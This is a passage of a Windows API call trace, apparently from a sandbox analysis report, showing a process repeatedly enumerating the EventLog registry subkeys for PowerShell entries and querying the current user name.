	[0774.638] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0774.638] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x1, lpName=0x2c73a0, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0774.638] CoTaskMemFree (pv=0x2c73a0) 
	[0774.638] CoTaskMemFree (pv=0x0) 
	[0774.638] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0774.638] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x2, lpName=0x2c73a0, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0774.638] CoTaskMemFree (pv=0x2c73a0) 
	[0774.638] CoTaskMemFree (pv=0x0) 
	[0774.638] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0774.638] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x3, lpName=0x2c73a0, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0774.638] CoTaskMemFree (pv=0x2c73a0) 
	[0774.638] CoTaskMemFree (pv=0x0) 
	[0774.638] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0774.639] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x4, lpName=0x2c73a0, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0774.639] CoTaskMemFree (pv=0x2c73a0) 
	[0774.639] CoTaskMemFree (pv=0x0) 
	[0774.639] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0774.639] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x5, lpName=0x2c73a0, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0774.639] CoTaskMemFree (pv=0x2c73a0) 
	[0774.639] CoTaskMemFree (pv=0x0) 
	[0774.639] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0774.639] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x6, lpName=0x2c73a0, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0774.639] CoTaskMemFree (pv=0x2c73a0) 
	[0774.639] CoTaskMemFree (pv=0x0) 
	[0774.639] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0774.639] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x7, lpName=0x2c73a0, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0774.639] CoTaskMemFree (pv=0x2c73a0) 
	[0774.640] CoTaskMemFree (pv=0x0) 
	[0774.640] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0774.640] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x8, lpName=0x2c73a0, lpcchName=0xcd178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0774.640] CoTaskMemFree (pv=0x2c73a0) 
	[0774.640] CoTaskMemFree (pv=0x0) 
	[0774.640] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x328) returned 0x0
	[0774.640] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0774.640] RegOpenKeyExW (in: hKey=0x324, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x32c) returned 0x0
	[0774.640] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0774.640] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x330) returned 0x0
	[0774.640] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0774.641] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x334) returned 0x0
	[0774.641] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0774.641] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x338) returned 0x0
	[0774.641] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0774.641] RegOpenKeyExW (in: hKey=0x324, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x33c) returned 0x0
	[0774.641] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0774.641] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x340) returned 0x0
	[0774.641] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0774.642] RegOpenKeyExW (in: hKey=0x324, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x344) returned 0x0
	[0774.642] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x0) returned 0x2
	[0774.642] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x348) returned 0x0
	[0774.642] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1d8 | out: phkResult=0xcd1d8*=0x34c) returned 0x0
	[0774.642] RegCloseKey (hKey=0x34c) returned 0x0
	[0774.642] RegCloseKey (hKey=0x324) returned 0x0
	[0774.643] RegCloseKey (hKey=0x348) returned 0x0
	[0774.653] CoTaskMemAlloc (cb=0x804) returned 0x1b81ca50
	[0774.653] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81ca50, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0774.654] CoTaskMemFree (pv=0x1b81ca50) 
	[0774.655] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0774.655] GetUserNameW (in: lpBuffer=0x2c73a0, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0774.656] CoTaskMemFree (pv=0x2c73a0) 
	[0776.547] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd128 | out: phkResult=0xcd128*=0x350) returned 0x0
	[0776.547] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd09c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd098, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd09c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd098*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.547] CoTaskMemFree (pv=0x0) 
	[0776.547] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.547] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.547] CoTaskMemFree (pv=0x2c73a0) 
	[0776.547] CoTaskMemFree (pv=0x0) 
	[0776.547] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.547] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.547] CoTaskMemFree (pv=0x2c73a0) 
	[0776.547] CoTaskMemFree (pv=0x0) 
	[0776.547] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.547] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.548] CoTaskMemFree (pv=0x2c73a0) 
	[0776.548] CoTaskMemFree (pv=0x0) 
	[0776.548] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.548] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.548] CoTaskMemFree (pv=0x2c73a0) 
	[0776.548] CoTaskMemFree (pv=0x0) 
	[0776.548] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.548] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.548] CoTaskMemFree (pv=0x2c73a0) 
	[0776.548] CoTaskMemFree (pv=0x0) 
	[0776.548] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.548] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.548] CoTaskMemFree (pv=0x2c73a0) 
	[0776.548] CoTaskMemFree (pv=0x0) 
	[0776.548] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.548] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.548] CoTaskMemFree (pv=0x2c73a0) 
	[0776.548] CoTaskMemFree (pv=0x0) 
	[0776.549] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.549] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.549] CoTaskMemFree (pv=0x2c73a0) 
	[0776.549] CoTaskMemFree (pv=0x0) 
	[0776.549] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.549] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.549] CoTaskMemFree (pv=0x2c73a0) 
	[0776.549] CoTaskMemFree (pv=0x0) 
	[0776.549] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x354) returned 0x0
	[0776.549] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.549] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x358) returned 0x0
	[0776.549] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.549] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x35c) returned 0x0
	[0776.550] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.550] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x360) returned 0x0
	[0776.550] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.550] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x364) returned 0x0
	[0776.550] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.550] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x368) returned 0x0
	[0776.550] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.550] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x36c) returned 0x0
	[0776.550] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.551] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x370) returned 0x0
	[0776.551] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.551] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x374) returned 0x0
	[0776.551] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x378) returned 0x0
	[0776.551] RegCloseKey (hKey=0x378) returned 0x0
	[0776.551] RegCloseKey (hKey=0x350) returned 0x0
	[0776.552] RegCloseKey (hKey=0x374) returned 0x0
	[0776.552] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd128 | out: phkResult=0xcd128*=0x374) returned 0x0
	[0776.552] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd09c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd098, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd09c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd098*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.553] CoTaskMemFree (pv=0x0) 
	[0776.553] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.553] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.553] CoTaskMemFree (pv=0x2c73a0) 
	[0776.553] CoTaskMemFree (pv=0x0) 
	[0776.553] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.553] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.553] CoTaskMemFree (pv=0x2c73a0) 
	[0776.553] CoTaskMemFree (pv=0x0) 
	[0776.553] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.553] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.553] CoTaskMemFree (pv=0x2c73a0) 
	[0776.553] CoTaskMemFree (pv=0x0) 
	[0776.553] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.553] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.553] CoTaskMemFree (pv=0x2c73a0) 
	[0776.553] CoTaskMemFree (pv=0x0) 
	[0776.553] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.553] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.554] CoTaskMemFree (pv=0x2c73a0) 
	[0776.554] CoTaskMemFree (pv=0x0) 
	[0776.554] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.554] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.554] CoTaskMemFree (pv=0x2c73a0) 
	[0776.554] CoTaskMemFree (pv=0x0) 
	[0776.554] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.554] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.554] CoTaskMemFree (pv=0x2c73a0) 
	[0776.554] CoTaskMemFree (pv=0x0) 
	[0776.554] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.554] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.554] CoTaskMemFree (pv=0x2c73a0) 
	[0776.554] CoTaskMemFree (pv=0x0) 
	[0776.554] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.554] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x2c73a0, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.554] CoTaskMemFree (pv=0x2c73a0) 
	[0776.555] CoTaskMemFree (pv=0x0) 
	[0776.555] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x350) returned 0x0
	[0776.555] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.555] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x378) returned 0x0
	[0776.555] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.555] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x37c) returned 0x0
	[0776.555] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.555] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x380) returned 0x0
	[0776.556] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.556] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x384) returned 0x0
	[0776.556] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.556] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x388) returned 0x0
	[0776.556] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.556] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x38c) returned 0x0
	[0776.556] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.556] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x390) returned 0x0
	[0776.556] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0776.557] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x394) returned 0x0
	[0776.557] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x398) returned 0x0
	[0776.557] RegCloseKey (hKey=0x398) returned 0x0
	[0776.557] RegCloseKey (hKey=0x374) returned 0x0
	[0776.557] RegCloseKey (hKey=0x394) returned 0x0
	[0776.562] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd0f8 | out: phkResult=0xcd0f8*=0x394) returned 0x0
	[0776.562] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd06c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd068, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd06c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd068*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.562] CoTaskMemFree (pv=0x0) 
	[0776.562] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.562] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x2c73a0, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.562] CoTaskMemFree (pv=0x2c73a0) 
	[0776.562] CoTaskMemFree (pv=0x0) 
	[0776.562] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0776.562] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x2c73a0, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.563] CoTaskMemFree (pv=0x2c73a0) 
